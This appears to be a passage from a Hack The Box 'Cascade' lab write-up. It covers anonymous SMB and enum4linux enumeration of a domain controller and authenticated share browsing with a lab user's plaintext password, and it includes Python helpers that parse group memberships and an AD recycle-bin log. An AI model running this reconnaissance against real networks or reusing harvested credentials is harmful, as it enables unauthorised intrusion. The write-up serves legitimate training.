SMB
Nmap discovered an SMB service on the target ports 139 and 445
Null Session
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ smbclient -L //casc-dc1.cascade.local/
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to casc-dc1.cascade.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
While the target SMB service allows anonymous access, the lack of privileges prevents me from enumerating the shares within
enum4linux
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ enum4linux -a -r -o -n -A -U $IP
starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jun 26 04:28:22 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.182
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.182 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.182 )================================
Looking up status of 10.10.10.182
No reply from 10.10.10.182
===================================( Session Check on 10.10.10.182 )===================================
[+] Server 10.10.10.182 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.182 )================================
domain name: CASCADE
domain sid: S-1-5-21-3332504370-1206983947-1165150453
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.10.182 )===================================
[E] Can't get OS info with smbclient
[+] got os info for 10.10.10.182 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.10.182 )=======================================
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull Name: Adrian Turnbull Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson Name: Ben Hanson Desc: (null)
index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc Name: BackupSvc Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman Name: David Burman Desc: (null)
index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe Name: Edward Crowe Desc: (null)
index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft Name: Ian Croft Desc: (null)
index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen Name: Joseph Allen Desc: (null)
index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand Name: John Goodhand Desc: (null)
index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield Name: James Wakefield Desc: (null)
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson Name: Ryan Thompson Desc: (null)
index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson Name: Stephanie Hickson Desc: (null)
index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith Name: Steve Smith Desc: (null)
index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util Name: Util Desc: (null)
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
=================================( Share Enumeration on 10.10.10.182 )=================================
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.182
============================( Password Policy Information for 10.10.10.182 )============================
[+] Attaching to 10.10.10.182 using a NULL share
[+] Trying protocol 139/SMB...
[!] protocol failed: Cannot request session (Called Name:10.10.10.182)
[+] Trying protocol 445/SMB...
[+] found domain(s):
[+] CASCADE
[+] Builtin
[+] password info for domain: CASCADE
[+] minimum password length: 5
[+] password history length: None
[+] maximum password age: Not Set
[+] password complexity flags: 000000
[+] domain refuse password change: 0
[+] domain password store cleartext: 0
[+] domain password lockout admins: 0
[+] domain password no clear change: 0
[+] domain password no anon change: 0
[+] domain password complex: 0
[+] minimum password age: None
[+] reset account lockout counter: 30 minutes
[+] locked account duration: 30 minutes
[+] account lockout threshold: None
[+] forced log off time: Not Set
[+] retieved partial password policy with rpcclient:
password complexity: Disabled
minimum password length: 5
=======================================( Groups on 10.10.10.182 )=======================================
[+] getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
[+] getting builtin group memberships:
group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
group: Users' (RID: 545) has member: CASCADE\Domain Users
group: Guests' (RID: 546) has member: CASCADE\CascGuest
group: Guests' (RID: 546) has member: CASCADE\Domain Guests
[+] getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[IT] rid:[0x459]
group:[Production] rid:[0x45a]
group:[HR] rid:[0x45b]
group:[AD Recycle Bin] rid:[0x45f]
group:[Backup] rid:[0x460]
group:[Temps] rid:[0x463]
group:[WinRMRemoteWMIUsers__] rid:[0x465]
group:[Remote Management Users] rid:[0x466]
group:[Factory] rid:[0x46c]
group:[Finance] rid:[0x46d]
group:[Audit Share] rid:[0x471]
group:[Data Share] rid:[0x472]
[+] getting local group memberships:
group: HR' (RID: 1115) has member: CASCADE\s.hickson
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\krbtgt
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Controllers
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Schema Admins
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Enterprise Admins
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Cert Publishers
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Admins
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Group Policy Creator Owners
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Read-only Domain Controllers
group: IT' (RID: 1113) has member: CASCADE\arksvc
group: IT' (RID: 1113) has member: CASCADE\s.smith
group: IT' (RID: 1113) has member: CASCADE\r.thompson
group: Remote Management Users' (RID: 1126) has member: CASCADE\arksvc
group: Remote Management Users' (RID: 1126) has member: CASCADE\s.smith
group: Audit Share' (RID: 1137) has member: CASCADE\s.smith
group: Data Share' (RID: 1138) has member: CASCADE\Domain Users
group: AD Recycle Bin' (RID: 1119) has member: CASCADE\arksvc
[+] getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]
[+] getting domain group memberships:
group: 'Group Policy Creator Owners' (RID: 520) has member: CASCADE\administrator
group: 'Domain Guests' (RID: 514) has member: CASCADE\CascGuest
group: 'Domain Users' (RID: 513) has member: CASCADE\administrator
group: 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
group: 'Domain Users' (RID: 513) has member: CASCADE\arksvc
group: 'Domain Users' (RID: 513) has member: CASCADE\s.smith
group: 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
group: 'Domain Users' (RID: 513) has member: CASCADE\util
group: 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
group: 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
group: 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
group: 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
group: 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
group: 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
group: 'Domain Users' (RID: 513) has member: CASCADE\d.burman
group: 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
group: 'Domain Users' (RID: 513) has member: CASCADE\j.allen
group: 'Domain Users' (RID: 513) has member: CASCADE\i.croft
==================( users on 10.10.10.182 via rid cycling (rids: 500-550,1000-1050) )==================
[i] found new sid:
S-1-5-21-3332504370-1206983947-1165150453
[i] found new sid:
S-1-5-21-2189247330-517467924-712900258
[+] Enumerating users using SID S-1-5-21-2189247330-517467924-712900258 and logon username '', password ''
S-1-5-21-2189247330-517467924-712900258-500 CASC-DC1\Administrator (Local User)
S-1-5-21-2189247330-517467924-712900258-501 CASC-DC1\Guest (Local User)
S-1-5-21-2189247330-517467924-712900258-513 CASC-DC1\None (Domain Group)
[+] Enumerating users using SID S-1-5-21-3332504370-1206983947-1165150453 and logon username '', password ''
S-1-5-21-3332504370-1206983947-1165150453-500 CASCADE\administrator (Local User)
S-1-5-21-3332504370-1206983947-1165150453-501 CASCADE\CascGuest (Local User)
S-1-5-21-3332504370-1206983947-1165150453-502 CASCADE\krbtgt (Local User)
S-1-5-21-3332504370-1206983947-1165150453-512 CASCADE\Domain Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-513 CASCADE\Domain Users (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-514 CASCADE\Domain Guests (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-515 CASCADE\Domain Computers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-516 CASCADE\Domain Controllers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-517 CASCADE\Cert Publishers (Local Group)
S-1-5-21-3332504370-1206983947-1165150453-518 CASCADE\Schema Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-519 CASCADE\Enterprise Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-520 CASCADE\Group Policy Creator Owners (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-521 CASCADE\Read-only Domain Controllers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-1001 CASCADE\CASC-DC1$ (Local User)
===============================( Getting printer info for 10.10.10.182 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on mon jun 26 04:34:49 2023
enum4linux enumerated a set of information regarding the target domain, including the domain users, groups, and group memberships. Some of that information was already identified during the MSRPC enumeration
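The membership lines above are worth mining for privileged access rather than reading by eye. As an added example (not part of the original writeup), the following Python parses enum4linux's `group: ... has member:` lines, handling both the builtin/local form that lacks the opening quote and the domain form that has it, and reports which accounts sit in groups a reviewer would question. The sample input is constructed from the lines above; the list of sensitive groups is my own assumption.

```python
import re
from collections import defaultdict

# Constructed sample copied from the enum4linux membership lines above. Note the
# two shapes: builtin/local lines lack the opening quote ("group: IT' ..."),
# domain lines have it ("group: 'Domain Users' ...").
SAMPLE = r"""group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
group: IT' (RID: 1113) has member: CASCADE\arksvc
group: IT' (RID: 1113) has member: CASCADE\s.smith
group: Remote Management Users' (RID: 1126) has member: CASCADE\arksvc
group: Remote Management Users' (RID: 1126) has member: CASCADE\s.smith
group: AD Recycle Bin' (RID: 1119) has member: CASCADE\arksvc
group: Data Share' (RID: 1138) has member: CASCADE\Domain Users
group: 'Group Policy Creator Owners' (RID: 520) has member: CASCADE\administrator
group: 'Domain Users' (RID: 513) has member: CASCADE\arksvc
"""

# One regex for both shapes: the opening quote is optional, the closing one is not.
MEMBER_RE = re.compile(
    r"^group:\s*'?(?P<group>[^']+)'\s*\(RID:\s*(?P<rid>\d+)\)\s*has member:\s*"
    r"(?P<domain>[^\\]+)\\(?P<member>.+?)\s*$"
)

# Groups whose members deserve a second look (assumed list, not from the tool).
SENSITIVE_GROUPS = {
    "Remote Management Users": "WinRM remote shell on the host",
    "AD Recycle Bin": "can read attributes of deleted AD objects",
    "Group Policy Creator Owners": "can create Group Policy Objects",
    "DnsAdmins": "administers the DNS service on the DC",
}


def parse_memberships(text):
    """Return (by_group, by_member, rids) built from enum4linux membership lines."""
    by_group = defaultdict(set)
    by_member = defaultdict(set)
    rids = {}
    for line in text.splitlines():
        m = MEMBER_RE.match(line)
        if not m:
            continue  # banners such as "[+] getting local group memberships:"
        group = m.group("group").strip()
        member = f"{m.group('domain')}\\{m.group('member')}"
        by_group[group].add(member)
        by_member[member].add(group)
        rids[group] = int(m.group("rid"))
    return dict(by_group), dict(by_member), rids


def sensitive_findings(by_member):
    """Map each member to the sorted list of sensitive groups it belongs to."""
    findings = {}
    for member, groups in by_member.items():
        hits = sorted(g for g in groups if g in SENSITIVE_GROUPS)
        if hits:
            findings[member] = hits
    return findings


def report(text):
    """Human-readable summary, one line per flagged member."""
    _, by_member, rids = parse_memberships(text)
    lines = []
    for member, hits in sorted(sensitive_findings(by_member).items()):
        detail = "; ".join(f"{g} (RID {rids[g]}): {SENSITIVE_GROUPS[g]}" for g in hits)
        lines.append(f"{member}: {detail}")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE):
        print(line)
```

On the real output this immediately shows that arksvc is the only account that combines a WinRM shell with AD Recycle Bin read access.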
r.thompson Session
With the valid domain credential, I should now be able to enumerate the target SMB server
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ smbmap -H CASC-DC1.CASCADE.LOCAL -u 'r.thompson' -p 'rY4n5eva'
[+] IP: 10.10.10.182:445 Name: cascade.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
2 non-default shares are available: Audit$ and Data
The current user has read access to the Data share
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ smbmap -H casc-dc1.cascade.local -u 'r.thompson' -p 'rY4n5eva' -R Data
[+] IP: CASC-DC1.CASCADE.LOCAL:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
Data READ ONLY
.\Data\*
dr--r--r-- 0 Tue Jan 28 23:05:51 2020 .
dr--r--r-- 0 Tue Jan 28 23:05:51 2020 ..
dr--r--r-- 0 Mon Jan 13 02:45:14 2020 Contractors
dr--r--r-- 0 Mon Jan 13 02:45:10 2020 Finance
dr--r--r-- 0 Tue Jan 28 19:04:51 2020 IT
dr--r--r-- 0 Mon Jan 13 02:45:20 2020 Production
dr--r--r-- 0 Mon Jan 13 02:45:16 2020 Temps
.\Data\IT\*
dr--r--r-- 0 Tue Jan 28 19:04:51 2020 .
dr--r--r-- 0 Tue Jan 28 19:04:51 2020 ..
dr--r--r-- 0 Tue Jan 28 19:00:30 2020 Email Archives
dr--r--r-- 0 Tue Jan 28 19:04:51 2020 LogonAudit
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 Logs
dr--r--r-- 0 Tue Jan 28 23:06:59 2020 Temp
.\Data\IT\Email Archives\*
dr--r--r-- 0 Tue Jan 28 19:00:30 2020 .
dr--r--r-- 0 Tue Jan 28 19:00:30 2020 ..
fr--r--r-- 2522 Tue Jan 28 19:00:30 2020 Meeting_Notes_June_2018.html
.\Data\IT\Logs\*
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 .
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 ..
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 Ark AD Recycle Bin
dr--r--r-- 0 Wed Jan 29 01:56:00 2020 DCs
.\Data\IT\Logs\Ark AD Recycle Bin\*
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 .
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 ..
fr--r--r-- 1303 Wed Jan 29 02:19:11 2020 ArkAdRecycleBin.log
.\Data\IT\Logs\DCs\*
dr--r--r-- 0 Wed Jan 29 01:56:00 2020 .
dr--r--r-- 0 Wed Jan 29 01:56:00 2020 ..
fr--r--r-- 5967 Sun Jan 26 23:22:05 2020 dcdiag.log
.\Data\IT\Temp\*
dr--r--r-- 0 Tue Jan 28 23:06:59 2020 .
dr--r--r-- 0 Tue Jan 28 23:06:59 2020 ..
dr--r--r-- 0 Tue Jan 28 23:06:55 2020 r.thompson
dr--r--r-- 0 Tue Jan 28 21:00:05 2020 s.smith
.\Data\IT\Temp\s.smith\*
dr--r--r-- 0 Tue Jan 28 21:00:05 2020 .
dr--r--r-- 0 Tue Jan 28 21:00:05 2020 ..
fr--r--r-- 2680 Tue Jan 28 21:00:01 2020 VNC Install.reg
There seems to be a lot here in the IT directory
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ smbget smb://casc-dc1.cascade.local/Data/IT -U 'r.thompson%rY4n5eva' -e -R
Using workgroup WORKGROUP, user r.thompson
Encryption required and server doesn't support SMB3 encryption - failing connect
smb://casc-dc1.cascade.local/Data/IT/Email Archives/Meeting_Notes_June_2018.html
smb://casc-dc1.cascade.local/Data/IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
smb://casc-dc1.cascade.local/Data/IT/Logs/DCs/dcdiag.log
smb://casc-dc1.cascade.local/Data/IT/Temp/s.smith/VNC Install.reg
Downloaded 12.18kB in 7 seconds
Having downloaded the entire directory, I will go through the files one by one
\\casc-dc1.cascade.local\Data\IT\Email Archives\Meeting_Notes_June_2018.html
┌──(kali㉿kali)-[~/…/labs/cascade/smb/Email Archives]
└─$ cat Meeting_Notes_June_2018.html | html2text
from: Steve Smith
to: IT (Internal)
sent: 14 June 2018 14:07
subject: Meeting Notes
For anyone that missed yesterdays meeting (Im looking at you Ben). Main
points are below:
-- New production network will be going live on Wednesday so keep an eye out
for any issues.
-- We will be using a temporary account to perform all tasks related to the
network migration and this account will be deleted at the end of 2018 once the
migration is complete. This will allow us to identify actions related to the
migration in security logs etc. Username is TempAdmin (password is the same as
the normal admin account password).
-- The winner of the Best GPO competition will be announced on Friday so get
your submissions in soon.
Steve
The HTML file appears to be a mail from Steve (likely the s.smith user), reminding the team of yesterday's meeting:
- The new production network is going live soon
- A temporary account, TempAdmin, is used for migration tasks; its password is the same as the "normal" admin account password
- The Best GPO competition
While the information above is rather out of context, I'll keep it in mind
\\casc-dc1.cascade.local\Data\IT\Logs
┌──(kali㉿kali)-[~/…/labs/cascade/smb/Logs]
└─$ tree
.
├── Ark AD Recycle Bin
│ └── ArkAdRecycleBin.log
└── DCs
└── dcdiag.log
3 directories, 2 files
The \\casc-dc1.cascade.local\Data\IT\Logs directory contains 2 sub-directories, each with a log file within
\\casc-dc1.cascade.local\Data\IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log
┌──(kali㉿kali)-[~/…/labs/cascade/smb/Logs]
└─$ cat Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
This appears to be a log file for a custom application implementing the AD Recycle Bin
According to the log, it's using version 1.2.2
The log file appears to have recorded the deletion of the 2 following AD objects:
CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
Those were performed as the ArkSvc user
Based on the context, the CN=Test,OU=Users,OU=UK,DC=cascade,DC=local object must have been for a test run, since it was way before the network migration mentioned in the mail above. Additionally, the latter specifically points to the mentioned account, TempAdmin
Those 2 objects are no longer available
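Pulling the deletion events out of that log programmatically makes the timeline above reproducible. As an added example (not the application's own code), the following Python parses the ArkAdRecycleBin.log format shown above into runs, recording the run-as user, errors, exit code and each object moved to CN=Deleted Objects, including the objectGUID embedded in the `\0ADEL:` name. The sample input is the log above copied verbatim; day-first dates are an assumption based on the OU=UK container.

```python
import re
from datetime import datetime

# The ArkAdRecycleBin.log shown above, copied verbatim (raw string keeps the backslashes).
SAMPLE_LOG = r"""1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
"""

LINE_RE = re.compile(r"^(?P<ts>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}) \[(?P<thread>[A-Z_]+)\] (?P<msg>.*)$")
START_RE = re.compile(r"^\*\* STARTING - .* v(?P<version>\d+\.\d+\.\d+) \*\*$")
RUNAS_RE = re.compile(r"^Running as user (?P<user>\S+)$")
ERROR_RE = re.compile(r"^Error: (?P<err>.+)$")
MOVE_RE = re.compile(r"^Moving object to AD recycle bin (?P<dn>.+)$")
MOVED_RE = re.compile(r"^Successfully moved object\. New location (?P<newdn>.+)$")
EXIT_RE = re.compile(r"^Exiting with error code (?P<code>\d+)$")
# A tombstoned object is renamed "<CN>\0ADEL:<objectGUID>" under CN=Deleted Objects.
DELETED_RE = re.compile(r"^CN=(?P<cn>.+?)\\0ADEL:(?P<guid>[0-9a-fA-F-]{36}),")


def parse_ark_log(text):
    """Split the log into runs; each run lists the objects it moved to the recycle bin."""
    runs, run, pending_dn = [], None, None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Assumption: day-first dates, as suggested by the OU=UK container.
        when = datetime.strptime(m.group("ts"), "%d/%m/%Y %H:%M")
        msg = m.group("msg")
        if (s := START_RE.match(msg)):
            run = {"started": when, "version": s.group("version"), "user": None,
                   "exit_code": None, "errors": [], "deletions": []}
            runs.append(run)
            pending_dn = None
        elif run is None:
            continue  # lines before the first banner
        elif (r := RUNAS_RE.match(msg)):
            run["user"] = r.group("user")
        elif (r := ERROR_RE.match(msg)):
            run["errors"].append(r.group("err"))
        elif (r := MOVE_RE.match(msg)):
            pending_dn = r.group("dn")
        elif (r := MOVED_RE.match(msg)):
            d = DELETED_RE.match(r.group("newdn"))
            run["deletions"].append({
                "when": when, "user": run["user"], "dn": pending_dn,
                "cn": d.group("cn") if d else None,
                "guid": d.group("guid").lower() if d else None,
                "new_location": r.group("newdn"),
            })
            pending_dn = None
        elif (r := EXIT_RE.match(msg)):
            run["exit_code"] = int(r.group("code"))
    return runs


def deletions(runs):
    """Flatten all successful deletions across runs, in log order."""
    return [d for run in runs for d in run["deletions"]]


if __name__ == "__main__":
    for d in deletions(parse_ark_log(SAMPLE_LOG)):
        print(d["when"], d["user"], d["cn"], d["guid"])
```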
\\casc-dc1.cascade.local\Data\IT\Logs\DCs\dcdiag.log
┌──(kali㉿kali)-[~/…/labs/cascade/smb/Logs]
└─$ cat DCs/dcdiag.log
Directory Server Diagnosis
Performing initial setup:
Trying to find home server...
Home Server = CASC-DC1
* Identified AD Forest.
Done gathering initial info.
Doing initial required tests
Testing server: Default-First-Site-Name\CASC-DC1
Starting test: Connectivity
......................... CASC-DC1 passed test Connectivity
Doing primary tests
Testing server: Default-First-Site-Name\CASC-DC1
Starting test: Advertising
......................... CASC-DC1 passed test Advertising
Starting test: FrsEvent
......................... CASC-DC1 passed test FrsEvent
Starting test: DFSREvent
......................... CASC-DC1 passed test DFSREvent
Starting test: SysVolCheck
......................... CASC-DC1 passed test SysVolCheck
Starting test: KccEvent
......................... CASC-DC1 passed test KccEvent
Starting test: KnowsOfRoleHolders
......................... CASC-DC1 passed test KnowsOfRoleHolders
Starting test: MachineAccount
......................... CASC-DC1 passed test MachineAccount
Starting test: NCSecDesc
......................... CASC-DC1 passed test NCSecDesc
Starting test: NetLogons
......................... CASC-DC1 passed test NetLogons
Starting test: ObjectsReplicated
......................... CASC-DC1 passed test ObjectsReplicated
Starting test: Replications
......................... CASC-DC1 passed test Replications
Starting test: RidManager
......................... CASC-DC1 passed test RidManager
Starting test: Services
......................... CASC-DC1 passed test Services
Starting test: SystemLog
A warning event occurred. EventID: 0x8000001D
Time Generated: 01/10/2020 15:48:14
Event String:
The Key Distribution Center (KDC) cannot find a suitable certificate to use for smart card logons, or the KDC certificate could not be verified. Smart card logon may not function correctly if this problem is not resolved. To correct this problem, either verify the existing KDC certificate using certutil.exe or enroll for a new KDC certificate.
An error event occurred. EventID: 0xC00038D6
Time Generated: 01/10/2020 15:48:43
Event String:
The DFS Namespace service could not initialize cross forest trust information on this domain controller, but it will periodically retry the operation. The return code is in the record data.
A warning event occurred. EventID: 0x000003F6
Time Generated: 01/10/2020 15:48:43
Event String:
Name resolution for the name _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.cascade.local timed out after none of the configured DNS servers responded.
A warning event occurred. EventID: 0x0000000C
Time Generated: 01/10/2020 15:48:43
Event String:
Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the AD PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the AD PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.
A warning event occurred. EventID: 0x000727AA
Time Generated: 01/10/2020 15:50:52
Event String:
The WinRM service failed to create the following SPNs: WSMAN/CASC-DC1.cascade.local; WSMAN/CASC-DC1.
......................... CASC-DC1 failed test SystemLog
Starting test: VerifyReferences
......................... CASC-DC1 passed test VerifyReferences
Running partition tests on : ForestDnsZones
Starting test: CheckSDRefDom
......................... ForestDnsZones passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... ForestDnsZones passed test
CrossRefValidation
Running partition tests on : DomainDnsZones
Starting test: CheckSDRefDom
......................... DomainDnsZones passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... DomainDnsZones passed test
CrossRefValidation
Running partition tests on : Schema
Starting test: CheckSDRefDom
......................... Schema passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... Schema passed test CrossRefValidation
Running partition tests on : Configuration
